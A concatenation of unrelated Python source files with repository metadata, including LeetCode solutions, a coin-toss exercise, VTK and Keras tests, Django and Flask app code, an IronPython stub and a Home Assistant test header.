"""
:type root: TreeNode
:rtype: List[int]
"""
# res list
res = []
# call the dfs function with parameters as root, length of tree and res array
self.dfs(root, 0, res)
# return res
return res
def dfs(self, root, level, res):
# if not root return empty
if not root:
return
# here we only append if the level and res same, so first node (since we call right subtree first) it gets appended
if len(res) == level:
res.append(root.val)
# call the right & left subtree first, increment levels using recursion
self.dfs(root.right, level + 1, res)
self.dfs(root.left, level + 1, res)
# Driver program to test above function
# Let us construct the BST shown in the figure
root = TreeNode(3)
root.left = TreeNode(9)
root.right = TreeNode(20)
root.left.left = TreeNode(15)
s = Solution()
print(s.rightSideView(root))
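# For the tree built above (3 with children 9 and 20, and 15 under 9), the
# right-first DFS prints [3, 20, 15] -- the right-most node visible on each level.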
|
[
"mrunalhirve@gmail.com"
] |
mrunalhirve@gmail.com
|
1bd8bc7fe24bf5d53d09e0a91e38a3bc344e4337
|
77b16dcd465b497c22cf3c096fa5c7d887d9b0c2
|
/Quintana_Jerrod/Assignments/python_fundamentals/coin_tosses.py
|
454a5cb05d4307c7ee2e66f1826a9f9c91709234
|
[
"MIT"
] |
permissive
|
curest0x1021/Python-Django-Web
|
a7cf8a45e0b924ce23791c18f6a6fb3732c36322
|
6264bc4c90ef1432ba0902c76b567cf3caaae221
|
refs/heads/master
| 2020-04-26T17:14:20.277967
| 2016-10-18T21:54:39
| 2016-10-18T21:54:39
| 173,706,702
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 394
|
py
|
head = 0
tail = 0
import random
for element in range (1, 5001):
toss = round(random.random())
if (toss == 1):
head += 1
toss_text='head'
else:
tail += 1
toss_text = 'tail'
print "Attempt #{}: Throwing a coin... It's a {}! ... Got {} head(s) so far and {} tail(s) so far".format(element,toss_text,head,tail)
print 'Ending the program, thank you!'
|
[
"43941751+curest0x1021@users.noreply.github.com"
] |
43941751+curest0x1021@users.noreply.github.com
|
5d1e945d40520440e25f880459d35743a8ad7393
|
77c518b87e67e9926d130f856a7edb12302596eb
|
/Filters/Core/Testing/Python/MassProperties.py
|
3753d7e93c51cd9108d83665ac7f0756038d055d
|
[
"BSD-3-Clause"
] |
permissive
|
t3dbrida/VTK
|
73e308baa1e779f208421a728a4a15fec5c4f591
|
e944bac3ba12295278dcbfa5d1cd7e71d6457bef
|
refs/heads/master
| 2023-08-31T21:01:58.375533
| 2019-09-23T06:43:00
| 2019-09-23T06:43:00
| 139,547,456
| 2
| 0
|
NOASSERTION
| 2019-11-22T14:46:48
| 2018-07-03T07:49:14
|
C++
|
UTF-8
|
Python
| false
| false
| 4,779
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
=========================================================================
Program: Visualization Toolkit
Module: TestNamedColorsIntegration.py
Copyright (c) Ken Martin, Will Schroeder, Bill Lorensen
All rights reserved.
See Copyright.txt or http://www.kitware.com/Copyright.htm for details.
This software is distributed WITHOUT ANY WARRANTY; without even
the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
PURPOSE. See the above copyright notice for more information.
=========================================================================
'''
import StringIO
import sys
import vtk
import vtk.test.Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
class MassProperties(vtk.test.Testing.vtkTest):
def testMassProperties(self):
# Create the RenderWindow, Renderer and both Actors
#
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
cone = vtk.vtkConeSource()
cone.SetResolution(50)
sphere = vtk.vtkSphereSource()
sphere.SetPhiResolution(50)
sphere.SetThetaResolution(50)
cube = vtk.vtkCubeSource()
cube.SetXLength(1)
cube.SetYLength(1)
cube.SetZLength(1)
sphereMapper = vtk.vtkPolyDataMapper()
sphereMapper.SetInputConnection(sphere.GetOutputPort())
sphereActor = vtk.vtkActor()
sphereActor.SetMapper(sphereMapper)
sphereActor.GetProperty().SetDiffuseColor(1, .2, .4)
coneMapper = vtk.vtkPolyDataMapper()
coneMapper.SetInputConnection(cone.GetOutputPort())
coneActor = vtk.vtkActor()
coneActor.SetMapper(coneMapper)
coneActor.GetProperty().SetDiffuseColor(.2, .4, 1)
cubeMapper = vtk.vtkPolyDataMapper()
cubeMapper.SetInputConnection(cube.GetOutputPort())
cubeActor = vtk.vtkActor()
cubeActor.SetMapper(cubeMapper)
cubeActor.GetProperty().SetDiffuseColor(.2, 1, .4)
#Add the actors to the renderer, set the background and size
#
sphereActor.SetPosition(-5, 0, 0)
ren.AddActor(sphereActor)
coneActor.SetPosition(0, 0, 0)
ren.AddActor(coneActor)
coneActor.SetPosition(5, 0, 0)
ren.AddActor(cubeActor)
tf = dict()
mp = dict()
vt = dict()
pdm = dict()
ta = dict()
def MakeText(primitive):
tf.update({primitive: vtk.vtkTriangleFilter()})
tf[primitive].SetInputConnection(primitive.GetOutputPort())
mp.update({primitive: vtk.vtkMassProperties()})
mp[primitive].SetInputConnection(tf[primitive].GetOutputPort())
# here we capture stdout and write it to a variable for processing.
summary = StringIO.StringIO()
# save the original stdout
old_stdout = sys.stdout
sys.stdout = summary
print mp[primitive]
summary = summary.getvalue()
startSum = summary.find(" VolumeX")
endSum = len(summary)
print summary[startSum:]
# Restore stdout
sys.stdout = old_stdout
vt.update({primitive: vtk.vtkVectorText()})
vt[primitive].SetText(summary[startSum:])
pdm.update({primitive: vtk.vtkPolyDataMapper()})
pdm[primitive].SetInputConnection(vt[primitive].GetOutputPort())
ta.update({primitive: vtk.vtkActor()})
ta[primitive].SetMapper(pdm[primitive])
ta[primitive].SetScale(.2, .2, .2)
return ta[primitive]
ren.AddActor(MakeText(sphere))
ren.AddActor(MakeText(cube))
ren.AddActor(MakeText(cone))
ta[sphere].SetPosition(sphereActor.GetPosition())
ta[sphere].AddPosition(-2, -1, 0)
ta[cube].SetPosition(cubeActor.GetPosition())
ta[cube].AddPosition(-2, -1, 0)
ta[cone].SetPosition(coneActor.GetPosition())
ta[cone].AddPosition(-2, -1, 0)
ren.SetBackground(0.1, 0.2, 0.4)
renWin.SetSize(786, 256)
# render the image
#
ren.ResetCamera()
cam1 = ren.GetActiveCamera()
cam1.Dolly(3)
ren.ResetCameraClippingRange()
# render and interact with data
iRen = vtk.vtkRenderWindowInteractor()
iRen.SetRenderWindow(renWin);
renWin.Render()
img_file = "MassProperties.png"
vtk.test.Testing.compareImage(iRen.GetRenderWindow(), vtk.test.Testing.getAbsImagePath(img_file), threshold=25)
vtk.test.Testing.interact()
if __name__ == "__main__":
vtk.test.Testing.main([(MassProperties, 'test')])
|
[
"nikhil.shetty@kitware.com"
] |
nikhil.shetty@kitware.com
|
b589b99088f59ac54b08810c679c36224ffbb831
|
b00b570c551044438c0cc2f10d13458dc06d7613
|
/blog/manage.py
|
04b540c28bb66d56d0fd30fdc4ac7f885faba4a4
|
[] |
no_license
|
shiretree/Blog
|
a938885d84265dfdafb338a4f226f0f52bb1cb10
|
9ed94c4a59468c2dea30c17cfdfe396f3e1e40b9
|
refs/heads/master
| 2020-08-18T18:33:39.991254
| 2019-10-25T15:31:35
| 2019-10-25T15:31:35
| 215,821,661
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 868
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
profile = os.environ.get('blog_PROFILE','develop')
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "blog.setting.%s" %profile)
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
[
"email"
] |
email
|
237d8804034a2eb54bcae35783ec451375f13cef
|
60a831fb3c92a9d2a2b52ff7f5a0f665d4692a24
|
/IronPythonStubs/release/stubs.min/System/Security/AccessControl_parts/SemaphoreAuditRule.py
|
4209494d452e4bc8c10f25f9e20fabe9f90a6b55
|
[
"MIT"
] |
permissive
|
shnlmn/Rhino-Grasshopper-Scripts
|
a9411098c5d1bbc55feb782def565d535b27b709
|
0e43c3c1d09fb12cdbd86a3c4e2ba49982e0f823
|
refs/heads/master
| 2020-04-10T18:59:43.518140
| 2020-04-08T02:49:07
| 2020-04-08T02:49:07
| 161,219,695
| 11
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 772
|
py
|
class SemaphoreAuditRule(AuditRule):
"""
Represents a set of access rights to be audited for a user or group. This class cannot be inherited.
SemaphoreAuditRule(identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags)
"""
@staticmethod
def __new__(self,identity,eventRights,flags):
""" __new__(cls: type,identity: IdentityReference,eventRights: SemaphoreRights,flags: AuditFlags) """
pass
AccessMask=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access mask for this rule.
"""
SemaphoreRights=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the access rights affected by the audit rule.
Get: SemaphoreRights(self: SemaphoreAuditRule) -> SemaphoreRights
"""
|
[
"magnetscoil@gmail.com"
] |
magnetscoil@gmail.com
|
bc1dbcc61274452333d727b7e2e93d0812fbc166
|
9222114c0b39007eb1af715cf18fc95ff282b38c
|
/problems/725. Split Linked List in Parts/2 - Hash Table.py
|
297fd75088427c8359ee2f838bbe5019b7190014
|
[] |
no_license
|
Vasilic-Maxim/LeetCode-Problems
|
1a2a09edca6489a349e5d69d087279630cff157d
|
359f3b78da90c41c7e42e5c9e13d49b4fc67fe41
|
refs/heads/master
| 2021-07-10T22:03:29.327658
| 2021-06-07T12:42:52
| 2021-06-07T12:42:52
| 246,826,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 821
|
py
|
from typing import List, Any
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def splitListToParts(self, root: ListNode, k: int) -> List[Any]:
"""
We always pay with time proportional to O(n + k). The worst
case arises when k > n.
Time: O(n + k)
Space: O(n + k)
"""
ids = []
while root is not None:
ids.append(root)
root = root.next
result = [None] * k
div, mod = divmod(len(ids), k)
start = 0
for i in range(k):
if start < len(ids):
result[i] = ids[start]
start += div + (mod > 0)
ids[start - 1].next = None
mod -= 1
return result
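# Worked example (added for illustration): for a 7-node list 1->2->...->7 and
# k = 3, divmod(7, 3) == (2, 1), so the parts come out with sizes 3, 2 and 2:
# [1,2,3], [4,5], [6,7].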
|
[
"lmantenl@gmail.com"
] |
lmantenl@gmail.com
|
788645067729b6ef213aed8af530ea537fe1dbbd
|
f90bb6e4a0d47c2c78362e431b47f74395bd42dd
|
/BitwiseORofSubarray.py
|
86117d5012ccf447c11b90a59621899ac47e9c1f
|
[] |
no_license
|
sainihimanshu1999/Dynamic-Programming
|
bc8811d10625af3bc4b81a4eb219b9b84f4e6821
|
65427f049b8b671e2a412497bbb06de8e8497823
|
refs/heads/main
| 2023-04-20T13:53:53.031324
| 2021-05-15T18:03:45
| 2021-05-15T18:03:45
| 365,940,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 519
|
py
|
'''
Bitwise or compares each bit of the number and return 1 when one of the bit is one of two numbers.
In this question we are making at list of set of the existing numbers and, then calculating the or
of last number with previous number and then saving the value in a set
'''
def bitWiseOr(self,nums):
    table = [{nums[i]} for i in range(len(nums))]  # one-element set per index; set(nums[i]) would fail on an int
for i in range(1,len(nums)):
for pre in table[i-1]:
table[i].add(nums[i]|pre)
return len(set.union(*table)) if len(nums)>0 else 0
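# Hypothetical usage sketch (the function keeps an unused `self` parameter, so
# any placeholder can be passed for it):
#   bitWiseOr(None, [1, 1, 2])  # subarray ORs are {1, 2, 3}, so this returns 3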
|
[
"sainihimanshu.1999@gmail.com"
] |
sainihimanshu.1999@gmail.com
|
6a34c022805208c44b234f2c301f4a94bd5a5713
|
3e3a835ee885eb9a71fd35ea58acd04361f72f47
|
/python基础/面向对象.py/老王开枪.py
|
7fb0d19a6621dfb5e9adef0e085cdce4217afadd
|
[] |
no_license
|
hanfang302/py-
|
dbb259f24e06fbe1a900df53ae6867acb8cb54ea
|
dd3be494ccef5100c0f06ed936f9a540d8ca0995
|
refs/heads/master
| 2020-03-16T01:59:57.002135
| 2018-05-07T12:02:21
| 2018-05-07T12:02:21
| 132,454,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,478
|
py
|
# Person class
class Ren:
def __init__(self,name):
self.name = name
self.xue = 100
self.qiang = None
def __str__(self):
        return self.name + ' remaining health: ' + str(self.xue)
def anzidan(self,danjia,zidan):
danjia.baocunzidan(zidan)
def andanjia(self,qiang,danjia):
qiang.lianjiedanjia(danjia)
def naqiang(self,qiang):
self.qiang = qiang
def kaiqiang(self,diren):
self.qiang.she(diren)
def diaoxue(self,shashangli):
self.xue -= shashangli
# Magazine class
class Danjia:
def __init__(self,rongliang):
self.rongliang = rongliang
self.rongnaList = []
def __str__(self):
        return 'Bullets currently in the magazine: ' + str(len(self.rongnaList)) + '/' + str(self.rongliang)
def baocunzidan(self,zidan):
if len(self.rongnaList) < self.rongliang:
self.rongnaList.append(zidan)
def chuzidan(self):
        # check whether the magazine still has bullets
if len(self.rongnaList) > 0:
            # take the bullet that was pushed into the magazine last
zidan = self.rongnaList[-1]
self.rongnaList.pop()
return zidan
else:
return None
# Bullet class
class Zidan:
def __init__(self,shashangli):
self.shashangli = shashangli
def shanghai(self,diren):
diren.diaoxue(self.shashangli)
# Gun class
class Qiang:
def __init__(self):
self.danjia = None
def __str__(self):
if self.danjia:
            return 'The gun has a magazine attached'
else:
            return 'The gun has no magazine'
def lianjiedanjia(self,danjia):
if not self.danjia:
self.danjia = danjia
def she(self,diren):
zidan = self.danjia.chuzidan()
if zidan:
zidan.shanghai(diren)
else:
            print('No bullets, the gun fired empty---')
# Create a person object
laowang = Ren('老王')
# Create a magazine
danjia = Danjia(20)
print(danjia)
# Create bullets in a loop and have Lao Wang load each one into the magazine
i = 0
while i<5:
zidan = Zidan(5)
laowang.anzidan(danjia,zidan)
i += 1
# Check the magazine's state after the bullets are loaded
print(danjia)
# Create a gun object
qiang = Qiang()
print(qiang)
# Create an enemy
diren = Ren('敌人')
print(diren)
# Have Lao Wang pick up the gun
laowang.naqiang(qiang)
# Lao Wang fires at the enemy
laowang.kaiqiang(diren)
print(diren)
print(danjia)
|
[
"hanfang123@aliyun.com"
] |
hanfang123@aliyun.com
|
ccf114278c3df46b18fe342b6d5710fdad5037a8
|
dac12c9178b13d60f401c4febff5569af8aa2719
|
/cvat-sdk/cvat_sdk/core/utils.py
|
1708dfd5779affd0d04466cf7bdec0ce4858f5c8
|
[
"LGPL-2.0-or-later",
"MIT",
"GPL-1.0-or-later"
] |
permissive
|
opencv/cvat
|
39dc66ca20f972ba40b79c44d7ce43590dc0b0b5
|
899c9fd75146744def061efd7ab1b1c6c9f6942f
|
refs/heads/develop
| 2023-08-19T04:27:56.974498
| 2023-08-18T09:58:25
| 2023-08-18T09:58:25
| 139,156,354
| 6,558
| 1,887
|
MIT
| 2023-09-14T12:44:39
| 2018-06-29T14:02:45
|
TypeScript
|
UTF-8
|
Python
| false
| false
| 2,077
|
py
|
# Copyright (C) 2022 CVAT.ai Corporation
#
# SPDX-License-Identifier: MIT
from __future__ import annotations
import contextlib
import itertools
import os
from typing import (
IO,
Any,
BinaryIO,
ContextManager,
Dict,
Iterator,
Literal,
Sequence,
TextIO,
Union,
overload,
)
def filter_dict(
d: Dict[str, Any], *, keep: Sequence[str] = None, drop: Sequence[str] = None
) -> Dict[str, Any]:
return {k: v for k, v in d.items() if (not keep or k in keep) and (not drop or k not in drop)}
@overload
def atomic_writer(path: Union[os.PathLike, str], mode: Literal["wb"]) -> ContextManager[BinaryIO]:
...
@overload
def atomic_writer(
path: Union[os.PathLike, str], mode: Literal["w"], encoding: str = "UTF-8"
) -> ContextManager[TextIO]:
...
@contextlib.contextmanager
def atomic_writer(
path: Union[os.PathLike, str], mode: Literal["w", "wb"], encoding: str = "UTF-8"
) -> Iterator[IO]:
"""
Returns a context manager that, when entered, returns a handle to a temporary
file opened with the specified `mode` and `encoding`. If the context manager
is exited via an exception, the temporary file is deleted. If the context manager
is exited normally, the file is renamed to `path`.
In other words, this function works like `open()`, but the file does not appear
at the specified path until and unless the context manager is exited
normally.
"""
path_str = os.fspath(path)
for counter in itertools.count():
tmp_path = f"{path_str}.tmp{counter}"
try:
if mode == "w":
tmp_file = open(tmp_path, "xt", encoding=encoding)
elif mode == "wb":
tmp_file = open(tmp_path, "xb")
else:
raise ValueError(f"Unsupported mode: {mode!r}")
break
except FileExistsError:
pass # try next counter value
try:
with tmp_file:
yield tmp_file
os.rename(tmp_path, path)
except:
os.unlink(tmp_path)
raise
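# Illustrative usage (not part of the original module; "config.json" is a
# hypothetical path):
#
#   with atomic_writer("config.json", "w") as f:
#       f.write('{"key": "value"}')
#
# "config.json" only appears once the with-block exits without raising.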
|
[
"noreply@github.com"
] |
opencv.noreply@github.com
|
e53556e3a604085aa6f7add4581285a4e52224d2
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/homeassistant/components/sensorpro/device.py
|
326eb8b8bbd743ce3d1776ded36c6a74498130aa
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
"""Support for SensorPro devices."""
from __future__ import annotations
from sensorpro_ble import DeviceKey
from homeassistant.components.bluetooth.passive_update_processor import (
PassiveBluetoothEntityKey,
)
def device_key_to_bluetooth_entity_key(
device_key: DeviceKey,
) -> PassiveBluetoothEntityKey:
"""Convert a device key to an entity key."""
return PassiveBluetoothEntityKey(device_key.key, device_key.device_id)
|
[
"noreply@github.com"
] |
home-assistant.noreply@github.com
|
a53c1b3c8f40c312958b8b0d54c48ea0ac2ffa34
|
824f831ce0921b3e364060710c9e531f53e52227
|
/Leetcode/Arrays/LC-287. Find the Duplicate Number.py
|
5901d94bc86c781e7f2bae0c1ee771b979e4f97d
|
[] |
no_license
|
adityakverma/Interview_Prepration
|
e854ff92c10d05bc2c82566ea797d2ce088de00a
|
d08a7f728c53943e9a27c33f8e4249633a69d1a6
|
refs/heads/master
| 2020-04-19T19:36:06.527353
| 2019-06-15T23:02:30
| 2019-06-15T23:02:30
| 168,392,921
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,076
|
py
|
# Given an array nums containing n + 1 integers where each integer is between 1 and n (inclusive),
# prove that at least one duplicate number must exist. Assume that there is only one duplicate
# number, find the duplicate one.
# Example 1:
#
# Input: [1,3,4,2,2]
# Output: 2
#
# Example 2:
#
# Input: [3,1,3,4,2]
# Output: 3
# =================================================================================================
# Excellent Binary Search Solution: O(nlogn)
# https://leetcode.com/problems/find-the-duplicate-number/discuss/72844/Two-Solutions-(with-explanation):-O(nlog(n))-and-O(n)-time-O(1)-space-without-changing-the-input-array
def findDuplicate(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
low = 1
high = len(nums) - 1
while low <= high:
mid = low + (high - low) / 2
count = 0
for i in nums:
if i <= mid:
count += 1
if count > mid:
high = mid - 1
# print "lower half. low & high are", low, high
else:
low = mid + 1
# print "upper half. low & high are", low, high
return low
'''
This solution is based on binary search.
At first the search space is numbers between 1 to n. Each time I select a number mid (which is the one in the middle) and count all the numbers equal to or less than mid. Then if the count is more than mid, the search space will be [1 mid] otherwise [mid+1 n]. I do this until search space is only one number.
Let's say n=10 and I select mid=5. Then I count all the numbers in the array which are less than equal mid. If the there are more than 5 numbers that are less than 5, then by Pigeonhole Principle (https://en.wikipedia.org/wiki/Pigeonhole_principle) one of them has occurred more than once. So I shrink the search space from [1 10] to [1 5]. Otherwise the duplicate number is in the second half so for the next step the search space would be [6 10].
'''
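# Worked trace (added for illustration) with nums = [1, 3, 4, 2, 2], so n = 4:
#   low=1, high=4 -> mid=2, three values are <= 2 and 3 > 2, so high=1
#   low=1, high=1 -> mid=1, one value is <= 1 and 1 is not > 1, so low=2
# The loop ends and low = 2 is returned, which is the duplicated number.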
#------------------------
# Regular logic
'''
def findDuplicate(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
nums.sort()
for i in range(1, len(nums)):
if nums[i] == nums[i-1]:
return nums[i]
'''
#---------------------------
# Cycle Detection Solution - O(n)
# https://leetcode.com/problems/find-the-duplicate-number/discuss/72846/My-easy-understood-solution-with-O(n)-time-and-O(1)-space-without-modifying-the-array.-With-clear-explanation.
# https://leetcode.com/problems/find-the-duplicate-number/solution/#
'''
def findDuplicate(self, nums):
# Find the intersection point of the two runners.
tortoise = nums[0]
hare = nums[0]
while True:
tortoise = nums[tortoise]
hare = nums[nums[hare]]
if tortoise == hare:
break
# Find the "entrance" to the cycle.
ptr1 = nums[0]
ptr2 = tortoise
while ptr1 != ptr2:
ptr1 = nums[ptr1]
ptr2 = nums[ptr2]
return ptr1
'''
|
[
"noreply@github.com"
] |
adityakverma.noreply@github.com
|
0cef47601e24ce2571e4fae9c030c83522f29d60
|
4505ae4b6fee0e32d799f22c32b18f79884daef4
|
/src/keras/tests/test_loss_masking.py
|
36ad471de77211bb1b4ed6288f94f34c0bdec80b
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
lu791019/iii_HA_Image_Recognition_DL
|
5cde9c2d0c06f8fe3fb69991b27fda87d42450e1
|
d5f56d62af6d3aac1c216ca4ff309db08a8c9072
|
refs/heads/master
| 2020-08-03T06:56:05.345175
| 2019-09-29T13:20:24
| 2019-09-29T13:20:24
| 211,660,905
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,531
|
py
|
import numpy as np
import pytest
from keras.models import Sequential
from keras.engine.training_utils import weighted_masked_objective
from keras.layers import TimeDistributed, Masking, Dense
from keras import losses
from keras import backend as K
def create_masking_model():
model = Sequential()
model.add(Masking(mask_value=0, input_shape=(None, 1)))
model.add(TimeDistributed(Dense(1, kernel_initializer='one')))
model.compile(loss='mse', optimizer='sgd')
return model
def test_masking():
np.random.seed(1337)
x = np.array([[[1], [1]],
[[0], [0]]])
model = create_masking_model()
y = np.array([[[1], [1]],
[[1], [1]]])
loss = model.train_on_batch(x, y)
assert loss == 0
def test_masking_is_all_zeros():
x = y = np.array([[[0], [0]]])
model = create_masking_model()
loss = model.train_on_batch(x, y)
assert loss == 0
def test_loss_masking():
weighted_loss = weighted_masked_objective(losses.get('mae'))
shape = (3, 4, 2)
x = np.arange(24).reshape(shape)
y = 2 * x
# Normally the trailing 1 is added by standardize_weights
weights = np.ones((3,))
mask = np.ones((3, 4))
mask[1, 0] = 0
out = K.eval(weighted_loss(K.variable(x),
K.variable(y),
K.variable(weights),
K.variable(mask)))
if __name__ == '__main__':
pytest.main([__file__])
|
[
"noreply@github.com"
] |
lu791019.noreply@github.com
|
c67d6fe7ce1bebab2ccccf1fba0bb20116d81484
|
98a5677396a4fdaad36ff8bb67ca08a8a79f2c13
|
/example/toolbox/management/commands/createcalaccessrawmodeldocs.py
|
556aeea30f7002572d4f9c2ebe907c70da08d12d
|
[
"MIT"
] |
permissive
|
livlab/django-calaccess-raw-data
|
542255e5ad9ca50996163591cb7b0f24f57724ff
|
3fd8b7505e158cb3159603ce4f42e3508af9e0bf
|
refs/heads/master
| 2020-04-05T23:07:01.637833
| 2015-08-29T18:19:08
| 2015-08-29T18:19:08
| 41,603,060
| 1
| 0
| null | 2015-08-29T18:23:17
| 2015-08-29T18:23:17
| null |
UTF-8
|
Python
| false
| false
| 1,089
|
py
|
import os
from django.conf import settings
from calaccess_raw import get_model_list
from django.template.loader import render_to_string
from calaccess_raw.management.commands import CalAccessCommand
class Command(CalAccessCommand):
help = 'Generate documentation for raw CAL-ACCESS database models'
def handle(self, *args, **kwargs):
self.docs_dir = os.path.join(
settings.REPO_DIR,
'docs'
)
self.target_path = os.path.join(self.docs_dir, 'models.rst')
model_list = sorted(get_model_list(), key=lambda x:x().klass_name)
group_list = {}
for m in model_list:
try:
group_list[m().klass_group].append(m)
except KeyError:
group_list[m().klass_group] = [m]
group_list = sorted(group_list.items(), key=lambda x:x[0])
context = {
'group_list': group_list,
}
rendered = render_to_string('toolbox/models.rst', context)
with open(self.target_path, 'w') as target_file:
target_file.write(rendered)
|
[
"ben.welsh@gmail.com"
] |
ben.welsh@gmail.com
|
0b45f2cad03d55adf2caed48ec14aabf6dd1204f
|
4ee2ebef215cf879aafdfa44221f52d82775176a
|
/Inheritance/Exercise/03-Players_And_Monsters/project/wizard.py
|
6c54fe969f329c58c92fa42e89364eb28a5deac0
|
[] |
no_license
|
Avstrian/SoftUni-Python-OOP
|
d2a9653863cba7bc095e647cd3f0561377f10f6d
|
6789f005b311039fd46ef1f55f3eb6fa9313e5a6
|
refs/heads/main
| 2023-08-01T09:31:38.099842
| 2021-08-24T04:21:38
| 2021-08-24T04:21:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from project.hero import Hero
class Wizard(Hero):
def __init__(self, username, level):
super().__init__(username, level)
def __str__(self):
return f"{self.username} of type Wizard has level {self.level}"
|
[
"noreply@github.com"
] |
Avstrian.noreply@github.com
|
14b95097ebef6310a10450b50fa85478aad59ebf
|
ef08d1e969a53c279e75b0120683eb3ec6914adf
|
/App/models.py
|
e0b07d140b75aa8ec9c5b43d15a64c2d31bf5e35
|
[] |
no_license
|
yuansuixin/learn-flask-city
|
7278fa567b5d6825fd2c121114495092c4612a09
|
f8bfd1d8daff9c18c1ee71f1770fdb83ce6dfa2f
|
refs/heads/master
| 2021-04-09T15:31:26.120510
| 2018-03-19T08:54:59
| 2018-03-19T08:54:59
| 125,822,109
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 759
|
py
|
from App.ext import model
class Provice(model.Model):
pid = model.Column(model.Integer,primary_key=True,autoincrement=True)
name = model.Column(model.String(32))
cities = model.relationship('City',backref='Provice',lazy='dynamic')
class City(model.Model):
cid = model.Column(model.Integer,primary_key=True,autoincrement=True)
name = model.Column(model.String(32))
provice = model.Column(model.Integer,model.ForeignKey(Provice.pid))
villages = model.relationship('Village', backref='City', lazy='dynamic')
class Village(model.Model):
vid = model.Column(model.Integer, primary_key=True, autoincrement=True)
name = model.Column(model.String(32))
city = model.Column(model.Integer, model.ForeignKey(City.cid))
|
[
"cyss428@163.com"
] |
cyss428@163.com
|
dbf46d8ca805cf2f79e58f27d726c87ea0b78fa6
|
264787b5f42d482db2ef0838b45ec79db71e6e2f
|
/home/views.py
|
1edd90b3506e5941e7f0205e6a6a010d7ff9f5b2
|
[] |
no_license
|
felipefoc/PrecoCertoChallenge2
|
f0700788f363ce9b72234a3d7df35ef1ea78d6b2
|
446854bc1823a06b207b30a10e14e71f7c982bee
|
refs/heads/main
| 2023-04-21T23:04:34.942298
| 2021-05-10T22:10:10
| 2021-05-10T22:10:10
| 366,187,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,431
|
py
|
from django.shortcuts import render
from django.views.generic import ListView
from home.models import Product, Order, ProductSold
from django.db.models import Q
import json
import datetime
def homeview(request):
with open('data.json', 'r+') as f:
data = json.load(f)
# y = ProductSold.objects.get(id=1)
# aa =ProductSold.objects.get(id=2)
# x = Order.objects.create(
# status='Finalizado',
# date=datetime.datetime.now(),
# total=10.00,
# )
# x.save()
# x.product_sold.add(y)
# x.product_sold.add(aa)
eita = Order.objects.all()
ob = Product.objects.all()
ab = ProductSold.objects.all()
    for i in eita:
        # product_sold is a many-to-many relation (see the .add() calls above),
        # so iterate over the related objects instead of reading .quantity on the manager
        for sold in i.product_sold.all():
            print(sold.quantity)
# for i in data['Orders']:
# print(i['Order']['ProductsSold'])
# sku = i['Order']['ProductsSold'][0]['ProductsSold']['sku']
# name = i['Order']['ProductsSold'][0]['ProductsSold']['name']
# quantity = i['Order']['ProductsSold'][0]['ProductsSold']['quantity']
# price = float(i['Order']['ProductsSold'][0]['ProductsSold']['price']) / int(quantity)
# cost_price = i['Order']['ProductsSold'][0]['ProductsSold']['cost_price']
# print(sku, name, quantity, price, cost_price)
return render(request, template_name='index.html', context={'data': ob, 'ab':ab, 'eita': eita})
# Create your views here.
# class HomeAPIView(ListView):
|
[
"felipemfmayer@gmail.com"
] |
felipemfmayer@gmail.com
|
e02f281a024f31c0d46eb8c5482cbf9893fe7f56
|
4c601eaa346e660c296e270cc2d79aea9a3721fe
|
/tests/components/homekit_controller/specific_devices/test_homeassistant_bridge.py
|
e9fc9b522ea9223ad12b87d8feb8101ae4925a4a
|
[
"Apache-2.0"
] |
permissive
|
basnijholt/home-assistant
|
f55110af9ff602274c0a929c7298ef97a0ef282f
|
ba55b4b8338a2dc0ba3f1d750efea49d86571291
|
refs/heads/dev
| 2023-01-21T11:53:52.621353
| 2020-08-08T15:03:06
| 2020-08-08T15:03:06
| 220,313,680
| 5
| 1
|
Apache-2.0
| 2023-01-13T06:04:49
| 2019-11-07T19:29:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,900
|
py
|
"""Test against characteristics captured from the Home Assistant HomeKit bridge running demo platforms."""
from homeassistant.components.fan import (
SUPPORT_DIRECTION,
SUPPORT_OSCILLATE,
SUPPORT_SET_SPEED,
)
from tests.components.homekit_controller.common import (
Helper,
setup_accessories_from_file,
setup_test_accessories,
)
async def test_homeassistant_bridge_fan_setup(hass):
"""Test that a SIMPLEconnect fan can be correctly setup in HA."""
